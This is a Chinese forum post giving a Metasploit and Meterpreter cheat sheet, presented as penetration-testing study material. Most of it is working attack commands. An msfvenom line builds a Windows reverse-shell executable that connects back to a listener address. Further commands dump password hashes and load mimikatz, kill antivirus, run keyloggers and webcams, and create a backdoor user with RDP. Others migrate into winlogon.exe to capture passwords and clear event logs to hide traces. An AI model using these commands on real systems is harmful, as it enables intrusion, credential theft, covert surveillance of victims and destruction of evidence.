|
本帖最后由 libo 于 2020-10-9 13:23 编辑
[md]> msfconsole 是著名的渗透测试平台,具有跨平台,高效,与其他平台兼容等特点。是学习中不可缺失的关键平台!
# 基础篇
### 01 生成 Windows
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.74 LPORT=555 -f exe -o 123.exe
```
### 02 配置 msf
```bash
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.123.74
set LPORT 5555
exploit
```
![msf.png](data/attachment/forum/202010/09/130639udo6dcdjodidq9qd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "msf.png")
### 03 常用命令
```
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载mimikatz
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件获取到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下
getpid #查看当前Meterpreter Shell的进程PID
migrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav/run post/windows/manage/killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
clearev #清除日志
```
![msf01.png](data/attachment/forum/202010/09/130938br6yfqb9hhli48n4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "msf01.png")
# 进阶篇
### 04 文件操作命令
```bash
cd #切换目标目录;
cat #读取文件内容;
rm #删除文件;
edit #使用vim编辑文件
ls #获取当前目录下的文件;
mkdir#新建目录;
rmdir #删除目录;
```
### 05 上传/获取文件
```bash
download file #命令可以帮助我们从目标系统中获取文件
upload file #命令则能够向目标系统上传文件。
```
### 06 权限提升
**getuid** 命令可以获取当前用户的信息,可以看到,当我们使用 getsystem 进行提权后,用户身材为 NT AUTHORITY\SYSTEM ,这个也就是 Windows 的系统权限。
### 07 运行程序
使用 `execute` 命令在目标系统中执行应用程序。这个命令的使用方法如下:
```
execute 参数 -f 可执行文件
```
可选参数如下
```bash
-f #指定可执行文件
-H #创建一个隐藏进程
-a #传递给命令的参数
-i # 跟进程进行交互
-m #从内存中执行
-t #使用当前伪造的线程令牌运行进程
-s #在给定会话中执行进程
```
### 08 启用远程桌面
```
run post/windows/manage/enable_rdp
```
### 09 进程迁移
Meterpreter 既可以单独运行,也可以与其他进程进行绑定。因此,我们可以让 Meterpreter 与类似 explorer.exe 这样的进程进行绑定,并以此来实现持久化。
在下面的例子中,我们会将 Meterpreter 跟 winlogon.exe 绑定,并在登录进程中捕获键盘记录,以获得用户的密码。
首先,我们需要使用: ps 命令查看目标设备中运行的进程:
migrate 目标进程 ID 命令来绑定目标进程 id,这里绑定目标 pid 的时候,经常会断了 shell。
```
migrate 1146
```
### 10 清除事件日志
完成测试操作之后,千万别忘了“打扫战场”。我们的所有操作都会被记录在目标系统的日志文件之中,因此我们需要在完成测试之后使用命令 `clearev ` 命令来清除事件日志
[/md] |
-
-
|